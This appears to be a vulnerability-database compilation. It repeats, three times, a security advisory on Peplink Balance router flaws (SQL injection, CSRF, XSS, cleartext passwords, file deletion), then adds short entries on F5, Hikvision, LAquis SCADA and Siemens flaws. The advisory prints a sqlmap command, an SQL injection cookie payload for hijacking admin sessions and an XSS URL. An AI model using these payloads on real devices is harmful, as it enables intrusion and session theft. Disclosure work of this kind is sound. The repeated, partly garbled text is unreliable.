SQL injection exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. An attack vector is the bauth cookie to cgi-bin/MANGA/admin.cgi. One impact is enumeration of user accounts by observing whether a session ID can be retrieved from the sessions database. plural Peplink Balance Device product firmware includes SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PeplinkBalance305 is a multi-export load balancing router for medium-sized enterprises. A remote attacker can exploit this vulnerability to enumerate user accounts. Peplink Balance 305 etc. The following products are affected: Peplink Balance 305; 380; 580; 710; 1350; 2500. X41 D-Sec GmbH Security Advisory: X41-2017-005 Multiple Vulnerabilities in peplink balance routers =================================================== Overview -------- Confirmed Affected Versions: 7.0.0-build1904 Confirmed Patched Versions: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin Vulnerable Firmware: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin Models: Balance Routers 305, 380, 580, 710, 1350, 2500 Vendor: Peplink Vendor URL: https://www.peplink.com/ Vector: Network Credit: X41 D-Sec GmbH, Eric Sesterhenn Additional Credits: Claus Overbeck (Abovo IT) Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/ Summary and Impact ------------------ Several issues have been identified, which allow attackers to access the administrative web interface with admin credentials, delete files, perform CSRF and XSS attacks. Product Description ------------------- From the vendor webpage: Use Load Balancing and SpeedFusion bandwidth bonding to deliver superfast VoIP, video streaming, and data using an SD-WAN enabled network. Even with a basic Balance 20 dual-WAN router, you can mix different transport technologies and providers to keep your network up when individual links go down. Switching between links is automatic and seamless. SQL Injection via bauth Cookie ============================== Severity Rating: Critical Vector: Network CVE: CVE-2017-8835 CWE: 89 CVSS Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Summary and Impact ------------------ Peplink devices are vulnerable to an SQL injection attack via the bauth cookie parameter which is set e.g. when accessing https://ip/cgi-bin/MANGA/admin.cgi. The injection can be checked with the following command: ./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi" --cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647" -p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ --flush-session -t trace.log --prefix "'" --suffix "--" -a The vulnerability in the Peplink device allows to access the SQLite session database containing user and session variables. By using the the following cookie in a web request, it is possible to select a running administrator session to be used for the attackers login. bauth=-12' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1') or '1'='2 By forming specialised SQL queries, it is possible to retrieve usernames from the database. This worked by returning a valid session in case the username existed and no session if it did not exist. In the first case the server did not set a new session cookie in the response to the request. SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='username' and substr(v.value,1,3)='adm') Workarounds ----------- Install vendor supplied update. No CSRF Protection ================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8836 CWE: 352 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ The CGI scripts in the administrative interface are not protected against cross site request forgery attacks. This allows an attacker to execute commands, if a logged in user visits a malicious website. This can for example be used to change the credentials of the administrative webinterface. Workarounds ----------- Install vendor supplied update. Passwords stored in Cleartext ============================= Severity Rating: Medium Vector: Network CVE: CVE-2017-8837 CWE: 256 CVSS Score: 4.0 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Summary and Impact ------------------ The Peplink devices store passwords in cleartext in the files /etc/waipass and /etc/roapass. In case one of these devices is compromised the attacker can gain access to the cleartext passwords and abuse them to compromise further systems. Workarounds ----------- Install vendor supplied update. XSS via syncid Parameter ======================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8838 CWE: 80 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to abuse the syncid parameter to trigger a cross-site-scripting issue by calling https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E This executes the JavaScript in the victims browser, which can be abused to steal session cookies. Workarounds ----------- Install vendor supplied update. XSS via preview.cgi =================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8839 CWE: 80 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to abuse the the orig_url parameter to trigger a cross-site-scripting issue in /guest/preview.cgi. The injection is directly into existing JavaScript. This executes the JavaScript in the victims browser, which can be abused to steal session cookies. Workarounds ----------- Install vendor supplied update. File Deletion ============= Severity Rating: Medium Vector: Network CVE: CVE-2017-8841 CWE: 73 CVSS Score: 6.5 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H Summary and Impact ------------------ A logged in user can delete arbitrary files on the Peplink devices, by abusing the /cgi-bin/MANGA/firmware_process.cgi. When an absolute path is provided to the upfile.path parameter the file provided in the path is deleted during the process. This can be abused to cause a denial of service (DoS). In combination with the missing CSRF protection, this can be abused remotely via a logged in user. Workarounds ----------- Install vendor supplied update. Information Disclosure ====================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8840 CWE: 200 CVSS Score: 5.3 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to retrieve sensitive information without a valid login by opening cgi-bin/HASync/hasync.cgi?debug=1 This displays the following: -----8<------------------------------------------------ Master LAN Address = [ <internal ip> / <netmask> ] Serial Number = [ <serial number> ] HA Group ID = [ <group id> ] Virtual IP = [ <internal ip> / <netmask> ] Submitted syncid = [ <syncid> ] -----8<------------------------------------------------ This information can be valuable for an attacker to exploit other issues. Workarounds ----------- Install vendor supplied update. About X41 D-Sec GmbH -------------------- X41 D-Sec is a provider of application security services. We focus on application code reviews, design review and security testing. X41 D-Sec GmbH was founded in 2015 by Markus Vervier. We support customers in various industries such as finance, software development and public institutions. Timeline -------- 2017-04-07 Issue found 2017-04-10 Vendor asked for security contact 2017-04-11 Vendor replied, send GPG key 2017-04-11 Information supplied to vendor 2017-04-11 Vendor acknowledges that the information is received 2017-04-17 Vendor acknowledges SQL injection 2017-05-08 CVE IDs for all issues requested 2017-05-08 CVE IDs assigned 2017-05-11 Vendor informed about CVE IDs 2017-05-29 Version provided to X41 for testing 2017-05-31 First test results send back to the vendor 2017-06-01 Remaining test results send back to the vendor 2017-06-05 Coordinated Firmware and Advisory release -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 GeschA$?ftsfA1/4hrer: Markus Vervier

CSRF exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The CGI scripts in the administrative interface are affected. This allows an attacker to execute commands, if a logged in user visits a malicious website. This can for example be used to change the credentials of the administrative webinterface. plural Peplink Balance Device product firmware contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PeplinkBalance305 is a multi-export load balancing router for medium-sized enterprises. A cross-site request forgery vulnerability exists in various PeplinkBalance products using firmware versions prior to fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_500hw3_1350hw2_2500-7.0.1-build2093. This vulnerability stems from the protection of CGI scripts from the management interface from cross-site request forgery attacks. Peplink Balance 305 etc. The following products are affected: Peplink Balance 305; 380; 580; 710; 1350; 2500. X41 D-Sec GmbH Security Advisory: X41-2017-005 Multiple Vulnerabilities in peplink balance routers =================================================== Overview -------- Confirmed Affected Versions: 7.0.0-build1904 Confirmed Patched Versions: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin Vulnerable Firmware: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin Models: Balance Routers 305, 380, 580, 710, 1350, 2500 Vendor: Peplink Vendor URL: https://www.peplink.com/ Vector: Network Credit: X41 D-Sec GmbH, Eric Sesterhenn Additional Credits: Claus Overbeck (Abovo IT) Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/ Summary and Impact ------------------ Several issues have been identified, which allow attackers to access the administrative web interface with admin credentials, delete files, perform CSRF and XSS attacks. Product Description ------------------- From the vendor webpage: Use Load Balancing and SpeedFusion bandwidth bonding to deliver superfast VoIP, video streaming, and data using an SD-WAN enabled network. Even with a basic Balance 20 dual-WAN router, you can mix different transport technologies and providers to keep your network up when individual links go down. Switching between links is automatic and seamless. SQL Injection via bauth Cookie ============================== Severity Rating: Critical Vector: Network CVE: CVE-2017-8835 CWE: 89 CVSS Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Summary and Impact ------------------ Peplink devices are vulnerable to an SQL injection attack via the bauth cookie parameter which is set e.g. when accessing https://ip/cgi-bin/MANGA/admin.cgi. The injection can be checked with the following command: ./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi" --cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647" -p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ --flush-session -t trace.log --prefix "'" --suffix "--" -a The vulnerability in the Peplink device allows to access the SQLite session database containing user and session variables. By using the the following cookie in a web request, it is possible to select a running administrator session to be used for the attackers login. bauth=-12' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1') or '1'='2 By forming specialised SQL queries, it is possible to retrieve usernames from the database. This worked by returning a valid session in case the username existed and no session if it did not exist. In the first case the server did not set a new session cookie in the response to the request. SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='username' and substr(v.value,1,3)='adm') Workarounds ----------- Install vendor supplied update. Workarounds ----------- Install vendor supplied update. Passwords stored in Cleartext ============================= Severity Rating: Medium Vector: Network CVE: CVE-2017-8837 CWE: 256 CVSS Score: 4.0 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Summary and Impact ------------------ The Peplink devices store passwords in cleartext in the files /etc/waipass and /etc/roapass. In case one of these devices is compromised the attacker can gain access to the cleartext passwords and abuse them to compromise further systems. Workarounds ----------- Install vendor supplied update. XSS via syncid Parameter ======================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8838 CWE: 80 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to abuse the syncid parameter to trigger a cross-site-scripting issue by calling https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E This executes the JavaScript in the victims browser, which can be abused to steal session cookies. Workarounds ----------- Install vendor supplied update. XSS via preview.cgi =================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8839 CWE: 80 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to abuse the the orig_url parameter to trigger a cross-site-scripting issue in /guest/preview.cgi. The injection is directly into existing JavaScript. This executes the JavaScript in the victims browser, which can be abused to steal session cookies. Workarounds ----------- Install vendor supplied update. File Deletion ============= Severity Rating: Medium Vector: Network CVE: CVE-2017-8841 CWE: 73 CVSS Score: 6.5 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H Summary and Impact ------------------ A logged in user can delete arbitrary files on the Peplink devices, by abusing the /cgi-bin/MANGA/firmware_process.cgi. When an absolute path is provided to the upfile.path parameter the file provided in the path is deleted during the process. This can be abused to cause a denial of service (DoS). In combination with the missing CSRF protection, this can be abused remotely via a logged in user. Workarounds ----------- Install vendor supplied update. Information Disclosure ====================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8840 CWE: 200 CVSS Score: 5.3 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to retrieve sensitive information without a valid login by opening cgi-bin/HASync/hasync.cgi?debug=1 This displays the following: -----8<------------------------------------------------ Master LAN Address = [ <internal ip> / <netmask> ] Serial Number = [ <serial number> ] HA Group ID = [ <group id> ] Virtual IP = [ <internal ip> / <netmask> ] Submitted syncid = [ <syncid> ] -----8<------------------------------------------------ This information can be valuable for an attacker to exploit other issues. Workarounds ----------- Install vendor supplied update. About X41 D-Sec GmbH -------------------- X41 D-Sec is a provider of application security services. We focus on application code reviews, design review and security testing. X41 D-Sec GmbH was founded in 2015 by Markus Vervier. We support customers in various industries such as finance, software development and public institutions. Timeline -------- 2017-04-07 Issue found 2017-04-10 Vendor asked for security contact 2017-04-11 Vendor replied, send GPG key 2017-04-11 Information supplied to vendor 2017-04-11 Vendor acknowledges that the information is received 2017-04-17 Vendor acknowledges SQL injection 2017-05-08 CVE IDs for all issues requested 2017-05-08 CVE IDs assigned 2017-05-11 Vendor informed about CVE IDs 2017-05-29 Version provided to X41 for testing 2017-05-31 First test results send back to the vendor 2017-06-01 Remaining test results send back to the vendor 2017-06-05 Coordinated Firmware and Advisory release -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 GeschA$?ftsfA1/4hrer: Markus Vervier

Cleartext password storage exists on Peplink Balance 305, 380, 580, 710, 1350, and 2500 devices with firmware before fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093. The files in question are /etc/waipass and /etc/roapass. In case one of these devices is compromised, the attacker can gain access to passwords and abuse them to compromise further systems. plural Peplink Balance Device product firmware contains a vulnerability related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The plaintext storage password vulnerability Balance305 is a multi-export load balancing router for medium-sized enterprises. The use of fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093 before the firmware version of the PeplinkBalance product exists, the vulnerability is derived from the password stored in the /etc/waipassand/etc/roapass file in clear text. Peplink Balance 305 etc. The following products are affected: Peplink Balance 305; 380; 580; 710; 1350; 2500. X41 D-Sec GmbH Security Advisory: X41-2017-005 Multiple Vulnerabilities in peplink balance routers =================================================== Overview -------- Confirmed Affected Versions: 7.0.0-build1904 Confirmed Patched Versions: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin Vulnerable Firmware: fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin Models: Balance Routers 305, 380, 580, 710, 1350, 2500 Vendor: Peplink Vendor URL: https://www.peplink.com/ Vector: Network Credit: X41 D-Sec GmbH, Eric Sesterhenn Additional Credits: Claus Overbeck (Abovo IT) Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/ Summary and Impact ------------------ Several issues have been identified, which allow attackers to access the administrative web interface with admin credentials, delete files, perform CSRF and XSS attacks. Product Description ------------------- From the vendor webpage: Use Load Balancing and SpeedFusion bandwidth bonding to deliver superfast VoIP, video streaming, and data using an SD-WAN enabled network. Even with a basic Balance 20 dual-WAN router, you can mix different transport technologies and providers to keep your network up when individual links go down. Switching between links is automatic and seamless. SQL Injection via bauth Cookie ============================== Severity Rating: Critical Vector: Network CVE: CVE-2017-8835 CWE: 89 CVSS Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Summary and Impact ------------------ Peplink devices are vulnerable to an SQL injection attack via the bauth cookie parameter which is set e.g. when accessing https://ip/cgi-bin/MANGA/admin.cgi. The injection can be checked with the following command: ./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi" --cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647" -p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ --flush-session -t trace.log --prefix "'" --suffix "--" -a The vulnerability in the Peplink device allows to access the SQLite session database containing user and session variables. By using the the following cookie in a web request, it is possible to select a running administrator session to be used for the attackers login. bauth=-12' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1') or '1'='2 By forming specialised SQL queries, it is possible to retrieve usernames from the database. This worked by returning a valid session in case the username existed and no session if it did not exist. In the first case the server did not set a new session cookie in the response to the request. SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='username' and substr(v.value,1,3)='adm') Workarounds ----------- Install vendor supplied update. No CSRF Protection ================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8836 CWE: 352 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ The CGI scripts in the administrative interface are not protected against cross site request forgery attacks. This allows an attacker to execute commands, if a logged in user visits a malicious website. This can for example be used to change the credentials of the administrative webinterface. Workarounds ----------- Install vendor supplied update. Passwords stored in Cleartext ============================= Severity Rating: Medium Vector: Network CVE: CVE-2017-8837 CWE: 256 CVSS Score: 4.0 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Summary and Impact ------------------ The Peplink devices store passwords in cleartext in the files /etc/waipass and /etc/roapass. Workarounds ----------- Install vendor supplied update. XSS via syncid Parameter ======================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8838 CWE: 80 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to abuse the syncid parameter to trigger a cross-site-scripting issue by calling https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E This executes the JavaScript in the victims browser, which can be abused to steal session cookies. Workarounds ----------- Install vendor supplied update. XSS via preview.cgi =================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8839 CWE: 80 CVSS Score: 5.4 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to abuse the the orig_url parameter to trigger a cross-site-scripting issue in /guest/preview.cgi. The injection is directly into existing JavaScript. This executes the JavaScript in the victims browser, which can be abused to steal session cookies. Workarounds ----------- Install vendor supplied update. File Deletion ============= Severity Rating: Medium Vector: Network CVE: CVE-2017-8841 CWE: 73 CVSS Score: 6.5 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H Summary and Impact ------------------ A logged in user can delete arbitrary files on the Peplink devices, by abusing the /cgi-bin/MANGA/firmware_process.cgi. When an absolute path is provided to the upfile.path parameter the file provided in the path is deleted during the process. This can be abused to cause a denial of service (DoS). In combination with the missing CSRF protection, this can be abused remotely via a logged in user. Workarounds ----------- Install vendor supplied update. Information Disclosure ====================== Severity Rating: Medium Vector: Network CVE: CVE-2017-8840 CWE: 200 CVSS Score: 5.3 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Summary and Impact ------------------ If the webinterface is accessible, it is possible to retrieve sensitive information without a valid login by opening cgi-bin/HASync/hasync.cgi?debug=1 This displays the following: -----8<------------------------------------------------ Master LAN Address = [ <internal ip> / <netmask> ] Serial Number = [ <serial number> ] HA Group ID = [ <group id> ] Virtual IP = [ <internal ip> / <netmask> ] Submitted syncid = [ <syncid> ] -----8<------------------------------------------------ This information can be valuable for an attacker to exploit other issues. Workarounds ----------- Install vendor supplied update. About X41 D-Sec GmbH -------------------- X41 D-Sec is a provider of application security services. We focus on application code reviews, design review and security testing. X41 D-Sec GmbH was founded in 2015 by Markus Vervier. We support customers in various industries such as finance, software development and public institutions. Timeline -------- 2017-04-07 Issue found 2017-04-10 Vendor asked for security contact 2017-04-11 Vendor replied, send GPG key 2017-04-11 Information supplied to vendor 2017-04-11 Vendor acknowledges that the information is received 2017-04-17 Vendor acknowledges SQL injection 2017-05-08 CVE IDs for all issues requested 2017-05-08 CVE IDs assigned 2017-05-11 Vendor informed about CVE IDs 2017-05-29 Version provided to X41 for testing 2017-05-31 First test results send back to the vendor 2017-06-01 Remaining test results send back to the vendor 2017-06-05 Coordinated Firmware and Advisory release -- X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen T: +49 241 9809418-0, Fax: -9 Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989 GeschA$?ftsfA1/4hrer: Markus Vervier

In F5 BIG-IP 12.0.0 through 12.1.2, an authenticated attacker may be able to cause an escalation of privileges through a crafted iControl REST connection. plural F5 BIG-IP The product contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. F5BIG-IP is a load balancer that uses a variety of allocation algorithms to distribute network requests to available servers in a server cluster. By managing incoming web data traffic and increasing effective network bandwidth, network visitors get as much as possible. The hardware device for the best networking experience. F5BIG-IPiControlREST has a remote privilege elevation vulnerability that allows remote authenticated users to issue a specially crafted iControlREST connection to gain elevated privileges on the target system. F5 BIG-IP LTM, etc. are all products of F5 Company in the United States. LTM is a local traffic manager; APM is a solution that provides secure unified access to business-critical applications and networks. Security flaws exist in several F5 products. The following products and versions are affected: F5 BIG-IP LTM version 12.0.0 to 12.1.2; BIG-IP AAM version 12.0.0 to 12.1.2; BIG-IP AFM version 12.0.0 to 12.1.2; BIG-IP Analytics version 12.0.0 through 12.1.2; BIG-IP APM version 12.0.0 through 12.1.2; BIG-IP ASM version 12.0.0 through 12.1.2; BIG-IP DNS version 12.0.0 to version 12.1.2; BIG-IP Link Controller version 12.0.0 to version 12.1.2; BIG-IP PEM version 12.0.0 to version 12.1.2; BIG-IP WebSafe version 12.0.0 to version 12.1.2

In F5 BIG-IP 12.1.0 through 12.1.2, specific websocket traffic patterns may cause a disruption of service for virtual servers configured to use the websocket profile. plural F5 BIG-IP The product contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. F5BIG-IP is a load balancer that uses a variety of allocation algorithms to distribute network requests to available servers in a server cluster. By managing incoming web data traffic and increasing effective network bandwidth, network visitors get as much as possible. The hardware device for the best networking experience. F5BIG-IP remote presence denial of service vulnerability, which can be exploited by remote users to send services on the target system by sending specially crafted websocket traffic, causing the target system to refuse service. F5 BIG-IP LTM, etc. are all products of F5 Company in the United States. LTM is a local traffic manager; APM is a solution that provides secure unified access to business-critical applications and networks. Security flaws exist in several F5 products. Attackers can exploit this vulnerability to compromise virtual server services. The following products and versions are affected: F5 BIG-IP LTM version 12.1.0 to 12.1.2; BIG-IP AAM version 12.1.0 to 12.1.2; BIG-IP AFM version 12.1.0 to 12.1.2; BIG-IP Analytics version 12.1.0 through 12.1.2; BIG-IP APM version 12.1.0 through 12.1.2; BIG-IP ASM version 12.1.0 through 12.1.2; BIG-IP DNS version 12.1.0 to version 12.1.2; BIG-IP Link Controller version 12.1.0 to version 12.1.2; BIG-IP PEM version 12.1.0 to version 12.1.2; BIG-IP WebSafe version 12.1.0 to version 12.1.2

Hikvision is a video-centric IoT solution and data operation service provider. Hikvision's multiple product systems use Apache Struts xwork as the website application framework. The file upload function of the Jakarta plugin has a remote command execution vulnerability s2-045. Attackers can modify the Content- in the HTTP request header when uploading files. Type value to trigger the vulnerability, and then execute system commands to obtain server permissions.

LAquis SCADA is a tool and language for data collection, process monitoring, industrial automation, storage, and report generation for quality management and application development. LAquis SCADA has a dll hijacking vulnerability. The vulnerability is caused by the failure to specify an absolute path for the DLL included in the LAquis SCADA application, allowing an attacker to use the vulnerability to build a malicious application, place it in a specific path, and make the application maliciously load the DLL and execute it

Specially crafted PROFINET DCP packets sent on a local Ethernet segment (Layer 2) to an affected product could cause a denial of service condition of that product. Human interaction is required to recover the system. PROFIBUS interfaces are not affected. SIMATIC HMI is an industrial device from Siemens AG, Germany. The SIMATIC HMI panels are used for operator control and monitoring of machines and equipment. Multiple Siemens Products is prone to multiple denial-of-service vulnerabilities. Attackers can exploit these issues to cause a denial-of-service condition. Manual restart of the server is required to resume normal operation. A vulnerability has been identified in SIMATIC CP 343-1 Std (All versions), SIMATIC CP 343-1 Lean (All versions), SIMATIC CP 343-1 Adv (All versions), SIMATIC CP 443-1 Std (All versions < V3.2.17), SIMATIC CP 443-1 Adv (All versions < V3.2.17), SIMATIC CP 443-1 OPC-UA (All versions), SIMATIC CP 1243-1 (All versions < V2.1.82), SIMATIC CP 1243-1 IRC (All versions < V2.1.82), SIMATIC CP 1243-1 IEC (All versions), SIMATIC CP 1243-1 DNP3 (All versions), SIMATIC CM 1542-1 (All versions < V2.0), SIMATIC CM 1542SP-1 (All versions < V1.0.15), SIMATIC CP 1542SP-1 IRC (All versions < V1.0.15), SIMATIC CP 1543SP-1 (All versions < V1.0.15), SIMATIC CP 1543-1 (All versions < V2.1), SIMATIC RF650R (All versions < V3.0), SIMATIC RF680R (All versions < V3.0), SIMATIC RF685R (All versions < V3.0), SIMATIC CP 1616 (All versions < V2.7), SIMATIC CP 1604 (All versions < V2.7), SIMATIC DK-16xx PN IO (All versions < V2.7), SCALANCE X-200 (All versions < V5.2.2), SCALANCE X-200 IRT (All versions), SCALANCE X-300/X408 (All versions < V4.1.0), SCALANCE X414 (All versions < V3.10.2), SCALANCE XM400 (All versions < V6.1), SCALANCE XR500 (All versions < V6.1), SCALANCE W700 (All versions < V6.1), SCALANCE M-800, S615 (All versions < V4.03), Softnet PROFINET IO for PC-based Windows systems (All versions < V14 SP1), IE/PB-Link (All versions < V3.0), IE/AS-i Link PN IO (All versions), SIMATIC Teleservice Adapter Standard Modem, IE Basic, IE Advanced (All versions), SITOP PSU8600 PROFINET (All versions < V1.2.0), SITOP UPS1600 PROFINET (All versions < V2.2.0), SIMATIC ET 200AL (All versions < V1.0.2), SIMATIC ET 200ecoPN (All versions), SIMATIC ET 200M (All versions), SIMATIC ET 200MP IM155-5 PN BA (All versions < V4.0.1), SIMATIC ET 200MP IM155-5 PN ST (All versions < V4.1), SIMATIC ET 200MP (except IM155-5 PN BA and IM155-5 PN ST) (All versions), SIMATIC ET 200pro (All versions), SIMATIC ET 200S (All versions), SIMATIC ET 200SP IM155-6 PN ST (All versions < V4.1.0), SIMATIC ET 200SP (except IM155-6 PN ST) (All versions), SIMATIC PN/PN Coupler (All versions < V4.0), Development/Evaluation Kit DK Standard Ethernet Controller (All versions < V4.1.1 Patch04), Development/Evaluation Kit EK-ERTEC 200P (All versions < V4.4.0 Patch01), Development/Evaluation Kit EK-ERTEC 200 (All versions < V4.2.1 Patch03), SIMATIC S7-200 SMART (All versions < V2.3), SIMATIC S7-300 incl. F and T (All versions < V3.X.14), SIMATIC S7-400 PN/DP V6 Incl. F (All versions < V6.0.6), SIMATIC S7-400-H V6 (All versions < V6.0.7), SIMATIC S7-400 PN/DP V7 Incl. F (All versions < V7.0.2), SIMATIC S7-410 (All versions < V8.2), SIMATIC S7-1200 incl. F (All versions < V4.2.1), SIMATIC S7-1500 incl. F, T, and TF (All versions < V2.1), SIMATIC S7-1500 Software Controller incl. F (All versions < V2.1), SIMATIC WinAC RTX 2010 incl. F (All versions), SIRIUS ACT 3SU1 interface module PROFINET (All versions), SIRIUS Soft Starter 3RW44 PN (All versions), SIRIUS Motor Starter M200D PROFINET (All versions), SIMOCODE pro V PROFINET (All versions < V2.0.0), SINAMICS DCM w. PN (All versions < V1.4 SP1 HF5), SINAMICS DCP w. PN (All versions < V1.2 HF 1), SINAMICS G110M w. PN (All versions < V4.7 SP6 HF3), SINAMICS G120(C/P/D) w. PN (All versions < V4.7 SP6 HF3), SINAMICS G130 V4.7 w. PN (All versions < V4.7 HF27), SINAMICS G150 V4.7 w. PN (V4.7: All versions < V4.7 HF27), SINAMICS G130 V4.8 w. PN (All versions < V4.8 HF4), SINAMICS G150 V4.8 w. PN (All versions < V4.8 HF4), SINAMICS S110 w. PN (All versions < V4.4 SP3 HF5), SINAMICS S120 V4.7 w. PN (All versions < V4.7 HF27), and others. This vulnerability affects only SIMATIC HMI Multi Panels and HMI Mobile Panels, and S7-300/S7-400 devices. Siemens SIMATIC S7-300 F, etc. Siemens SIMATIC S7-300 F is a process controller. SIMATIC HMI Comfort Panels are touch screens

